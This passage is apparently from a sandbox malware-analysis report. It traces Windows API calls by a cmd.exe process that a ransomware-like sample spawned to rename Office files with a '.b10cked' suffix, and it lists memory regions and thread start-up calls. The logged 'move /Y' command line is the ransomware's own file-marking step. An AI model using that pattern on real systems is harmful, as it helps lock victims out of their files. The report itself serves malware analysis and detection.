LCType=0x23, lpLCData=0x20fcb0, cchData=128 | out: lpLCData="0") returned 2 [0153.482] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x20fcb0, cchData=128 | out: lpLCData="0") returned 2 [0153.482] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x20fcb0, cchData=128 | out: lpLCData="1") returned 2 [0153.482] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0153.482] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0153.482] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0153.482] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0153.482] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0153.482] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0153.482] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0153.482] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0153.482] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0153.482] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0153.483] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0153.484] GetConsoleTitleW (in: lpConsoleTitle=0x2d0930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0153.484] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0153.484] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0153.484] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0153.484] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0153.485] _wcsicmp (_String1="move", _String2=")") returned 68 [0153.485] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0153.485] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0153.485] _wcsicmp (_String1="IF", _String2="move") returned -4 [0153.485] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0153.485] _wcsicmp (_String1="REM", _String2="move") returned 5 [0153.485] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0153.489] GetConsoleTitleW (in: lpConsoleTitle=0x20f9a8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0153.576] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0153.576] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0153.576] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0153.576] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0153.576] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0153.576] _wcsicmp (_String1="move", _String2="CD") returned 10 [0153.576] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0153.576] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0153.576] _wcsicmp (_String1="move", _String2="REN") returned -5 [0153.576] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0153.576] _wcsicmp (_String1="move", _String2="SET") returned -6 [0153.576] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0153.576] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0153.576] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0153.576] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0153.576] _wcsicmp (_String1="move", _String2="MD") returned 11 [0153.576] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0153.576] _wcsicmp (_String1="move", _String2="RD") returned -5 [0153.576] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0153.576] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0153.576] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0153.576] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0153.576] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0153.576] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0153.576] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0153.576] _wcsicmp (_String1="move", _String2="VER") returned -9 [0153.576] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0153.576] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0153.577] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0153.577] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0153.577] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0153.577] _wcsicmp (_String1="move", _String2="START") returned -6 [0153.577] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0153.577] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0153.577] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0153.578] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0153.578] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0153.578] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x20f764, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x20f75c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x20f75c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0153.579] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0153.579] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0153.579] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0153.579] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0153.579] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0153.579] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0153.579] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0153.579] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0153.579] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0153.579] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0153.579] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0153.579] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0153.579] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0153.579] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0153.579] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0153.579] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0153.579] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0153.579] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0153.579] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0153.579] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0153.580] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0153.580] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0153.580] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0153.580] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0153.580] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0153.580] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0153.580] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0153.580] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0153.580] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0153.580] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0153.580] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0153.580] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0153.580] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0153.580] _wcsicmp (_String1="MAPIRD~1.TRX", _String2=".") returned 63 [0153.580] _wcsicmp (_String1="MAPIRD~1.TRX", _String2="..") returned 63 [0153.580] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MAPIRD~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\mapird~1.trx")) returned 0x2020 [0153.581] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2e1f18 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0153.581] SetErrorMode (uMode=0x0) returned 0x0 [0153.581] SetErrorMode (uMode=0x1) returned 0x0 [0153.581] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MAPIRD~1.TRX", nBufferLength=0x104, lpBuffer=0x20f0ec, lpFilePart=0x20f0d4 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MAPIRD~1.TRX", lpFilePart=0x20f0d4*="MAPIRD~1.TRX") returned 0x3c [0153.581] SetErrorMode (uMode=0x0) returned 0x1 [0153.581] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036")) returned 0x2012 [0153.581] _wcsicmp (_String1="MAPIRD~1.TRX", _String2=".") returned 63 [0153.581] _wcsicmp (_String1="MAPIRD~1.TRX", _String2="..") returned 63 [0153.581] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MAPIRD~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\mapird~1.trx")) returned 0x2020 [0153.581] SetErrorMode (uMode=0x0) returned 0x0 [0153.581] SetErrorMode (uMode=0x1) returned 0x0 [0153.581] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MAPIRD~1.TRX", nBufferLength=0x104, lpBuffer=0x20f568, lpFilePart=0x20f300 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MAPIRD~1.TRX", lpFilePart=0x20f300*="MAPIRD~1.TRX") returned 0x3c [0153.581] SetErrorMode (uMode=0x0) returned 0x1 [0153.582] SetErrorMode (uMode=0x0) returned 0x0 [0153.582] SetErrorMode (uMode=0x1) returned 0x0 [0153.582] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MAPIR.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x20f770, lpFilePart=0x20f300 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MAPIR.DLL.trx_dll.b10cked", lpFilePart=0x20f300*="MAPIR.DLL.trx_dll.b10cked") returned 0x49 [0153.582] SetErrorMode (uMode=0x0) returned 0x1 [0153.582] SetLastError (dwErrCode=0x0) [0153.582] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MAPIR.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\mapir.dll.trx_dll.b10cked")) returned 0xffffffff [0153.582] GetLastError () returned 0x2 [0153.582] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MAPIRD~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x20ec7c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ec7c) returned 0x2e2128 [0153.582] FindNextFileW (in: hFindFile=0x2e2128, lpFindFileData=0x20ec7c | out: lpFindFileData=0x20ec7c) returned 0 [0153.583] GetLastError () returned 0x12 [0153.583] FindClose (in: hFindFile=0x2e2128 | out: hFindFile=0x2e2128) returned 1 [0153.584] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MAPIRD~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x2e1cb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2e1cb8) returned 0x2e2128 [0153.584] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MAPIR.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x20ef14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MAPIR.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x49 [0153.584] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MAPIR.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x20ef14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MAPIR.DLL.trx_dll", lpFilePart=0x0) returned 0x41 [0153.584] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MAPIR.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\mapir.dll.trx_dll")) returned 0x2020 [0153.585] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MAPIR.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\mapir.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MAPIR.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\mapir.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0153.585] FindClose (in: hFindFile=0x2e2128 | out: hFindFile=0x2e2128) returned 1 [0153.585] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x20eec8 | out: _Buffer=" 1") returned 9 [0153.585] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.585] GetFileType (hFile=0x7) returned 0x2 [0153.585] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0153.586] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x20ee54 | out: lpMode=0x20ee54) returned 1 [0153.586] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.586] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20ee88 | out: lpConsoleScreenBufferInfo=0x20ee88) returned 1 [0153.586] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0153.586] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x20eec8 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0153.586] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x20eeac, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x20eeac*=0x1a) returned 1 [0153.587] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.587] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0153.587] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.587] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0153.587] _get_osfhandle (_FileHandle=0) returned 0x3 [0153.587] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0153.587] SetConsoleInputExeNameW () returned 0x1 [0153.587] GetConsoleOutputCP () returned 0x1b5 [0153.587] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0153.587] SetThreadUILanguage (LangId=0x0) returned 0x409 [0153.588] exit (_Code=0) Process: id = "254" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ca0" os_pid = "0xe20" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MOR6IN~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MOR6INT.REST.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 20737 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 20738 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 20739 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 20740 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 20741 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 20742 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 20743 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 20744 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 20745 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 20746 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 20822 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 20823 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 20824 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 20825 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 20826 start_va = 0x390000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 20827 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 20828 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 20829 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 20830 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 20831 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 20832 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 20833 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 20834 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 20835 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 20836 start_va = 0x3a0000 end_va = 0x467fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 20837 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 20838 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 20839 start_va = 0x1c0000 end_va = 0x1c6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 20840 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 20841 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 20842 start_va = 0x2f0000 end_va = 0x2f0fff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 20843 start_va = 0x470000 end_va = 0x570fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 20844 start_va = 0x580000 end_va = 0x117ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 20845 start_va = 0x1180000 end_va = 0x12e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001180000" filename = "" Thread: id = 317 os_tid = 0xeac [0153.514] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2efa84 | out: lpSystemTimeAsFileTime=0x2efa84*(dwLowDateTime=0x957071a0, dwHighDateTime=0x1d440a9)) [0153.514] GetCurrentProcessId () returned 0xe20 [0153.514] GetCurrentThreadId () returned 0xeac [0153.514] GetTickCount () returned 0x2f49a [0153.514] QueryPerformanceCounter (in: lpPerformanceCount=0x2efa7c | out: lpPerformanceCount=0x2efa7c*=21030312099) returned 1 [0153.515] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0153.515] __set_app_type (_Type=0x1) [0153.515] __p__fmode () returned 0x76b331f4 [0153.515] __p__commode () returned 0x76b331fc [0153.515] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0153.515] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0153.515] GetCurrentThreadId () returned 0xeac [0153.515] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xeac) returned 0x38 [0153.515] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0153.515] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0153.515] SetThreadUILanguage (LangId=0x0) returned 0x409 [0153.517] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0153.517] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2efa14 | out: phkResult=0x2efa14*=0x0) returned 0x2 [0153.517] VirtualQuery (in: lpAddress=0x2efa4b, lpBuffer=0x2ef9e4, dwLength=0x1c | out: lpBuffer=0x2ef9e4*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0153.517] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2ef9e4, dwLength=0x1c | out: lpBuffer=0x2ef9e4*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0153.517] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2ef9e4, dwLength=0x1c | out: lpBuffer=0x2ef9e4*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0153.517] VirtualQuery (in: lpAddress=0x1f3000, lpBuffer=0x2ef9e4, dwLength=0x1c | out: lpBuffer=0x2ef9e4*(BaseAddress=0x1f3000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0153.517] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2ef9e4, dwLength=0x1c | out: lpBuffer=0x2ef9e4*(BaseAddress=0x2f0000, AllocationBase=0x2f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0153.517] GetConsoleOutputCP () returned 0x1b5 [0153.518] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0153.518] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0153.518] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.518] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0153.518] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.518] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0153.518] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.518] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0153.518] _get_osfhandle (_FileHandle=0) returned 0x3 [0153.518] GetConsoleMode 